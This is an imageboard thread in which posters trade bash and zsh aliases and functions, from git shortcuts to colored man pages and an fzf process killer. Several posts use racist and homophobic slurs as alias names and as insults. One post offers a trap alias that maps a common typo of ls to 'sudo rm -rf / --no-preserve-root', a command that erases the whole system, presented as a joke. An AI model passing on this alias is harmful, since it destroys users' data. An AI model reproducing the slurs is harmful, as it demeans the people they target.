alias nigger="chromium
Alias nigger="chromium ;
Other urls found in this thread:
alias nigger="chromium
alias nigger="chromium
alias vi=nvim
alias vim=nvim
alias nano=nvim
alias nvim=emacs
Do many anons unironically use this shit?
alias op="faggot"
based and visual code pilled
xD racism
LOL SWEAR WORDS TOP KEK
alias sl="echo dumbass && sudo rm -rf / --no-preserve-root"
force yourself to improve typing accuracy fast
based
fuck you
It works just once.
# aliases
alias sudo="sudo "
alias ptpb='curl -F c=@- ptpb.pw'
alias ri="rm -i"
alias mi="mv -i"
alias ci="cp -i"
alias ls="ls --color=always"
alias grep="grep --color=always"
alias less="less -R"
alias vimr="vim -R"
alias sprunge="curl -F 'sprunge=
nigger
>alias vi
>what is eselect vi
>what is update-alternatives
Imagine being THIS ignorant towards modern Loonix features
alias nigger="OP"
alias faggot="OP"
fuck off gentooneet
you could just not put in your password
>update-alternatives
>Gentoo
Imagine being THIS ignorant towards modern Loonix features. I run Fedora btw.
alias ..="cd .."
Discord tranny
>alias ls="ls --color=always"
why?
alias lss='ls -la | grep $1'
# Aliases
alias zshconfig="code ~/.zshrc"
alias zshreload="source ~/.zshrc"
alias gs="git status"
alias gpl="git pull"
alias stash="git stash"
alias stash pop="git stash pop"
alias gps="git push"
alias gck="git checkout"
alias gcm="git commit -m"
alias log1="git log --graph --decorate --pretty=oneline --abbrev-commit"
alias web="cd Documents/web"
alias pacman="sudo pacman"
alias mariadb="systemctl start mariadb.service"
alias mariadbstop="systemctl stop mariadb.service"
alias ec2go="ssh -i "~/Downloads/aws-ec2-key.pem" compute-1.amazonaws.com"
alias dropgo="ssh [email protected]"
functions are basically the same
mcd () {
mkdir -p $1
cd $1
}
kp () {
kill -9 $(ps -ef | fzf | awk -F" " '{print $2}')
}
Why not?
ok
#color man pages
man() {
env \
LESS_TERMCAP_mb=$(printf "\e[1;31m") \
LESS_TERMCAP_md=$(printf "\e[1;31m") \
LESS_TERMCAP_me=$(printf "\e[0m") \
LESS_TERMCAP_se=$(printf "\e[0m") \
LESS_TERMCAP_so=$(printf "\e[1;44;33m") \
LESS_TERMCAP_ue=$(printf "\e[0m") \
LESS_TERMCAP_us=$(printf "\e[1;32m") \
man "$@"
}
i mean what does it do? i ran it with and without the arguments and nothing changed
is ls not colored by default?
do i unknowingly have rice that changed the default behavior
Depends, on my arch linux setup it didn't. Check your /etc/bash.bashrc and whatevers.
# qol aliases
alias rn="source ranger"
alias ranger="source ranger"
alias term='urxvt -cd "`xcwd`" &'
alias run='~/.util/run.sh'
alias debugtest='~/.util/debugtest.sh'
alias debug='~/.util/debug.sh'
alias cpimg='~/.util/image-to-clipboard.py'
alias xclip='xclip -selection clipboard'
[ -f ~/.fzf.bash ] && source ~/.fzf.bash
alias givemetoky='~/.util/curls/iam/getTokStagin.sh'
alias pret='python -m json.tool'
its not colored try running /bin/ls directly
Actually imagine the type of person who has set up these aliases...
what the fuck. /bin/ls isnt colored. odd
thanks anons
alias e="emacs -nw"
alias v="vi"
alias open="nautilus . &"
alias sl="ls"
alias web="brave-browser --app='duckduckgo.com
Thanks, just learned that man pages apparently support color.
Didn't even know about fzf.
Not bad actually
Will be stealing this
>sl="ls"
Chaotic good
Chaotic evil
remainder that this is in the default ubuntu .bashrc
# sleep 10; alert
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'
dir = ls
cm () { mkdir -p -- "$1" && cd -P -- "$1"}
lines () { wc -l "$1" | sed 's/ .*//' }
alias exift='exiftool -overwrite_original -all='
alias pipinst='python3 -m pip install --user --upgrade'
alias fuck='sudo $(history -p \!\!)'
alias l='ls -oAhqp --color --group-directories-first --time-style="+%d-%m-%y-%H$
alias music='ncmpcpp'
alias cd='cd -P'
alias desu='sudo '
alias uptime='uptime -p'
alias inspect='tail --follow'
alias timeit='/usr/bin/time'
alias record='sox -t alsa default ~/test.wav'
alias uninst='sudo apt remove --purge --auto-remove'
Delete this
There's a bash opt that auto-cds if you type a dirname.
I use this all the time for background processes like rsyncing my music collection.
alias *='echo "null" > /dev/null'
what does that sudo one do?
Allows you to use aliases when using sudo.
Try the following:
alias foobar='echo "bar"'
sudo foobar
alias sudo='sudo '
sudo foobar
alias goddess="chromium
>using chromium instead of icecat
Cd.. Cd code... cd...
nice, very useful
>not !@
>/u/
based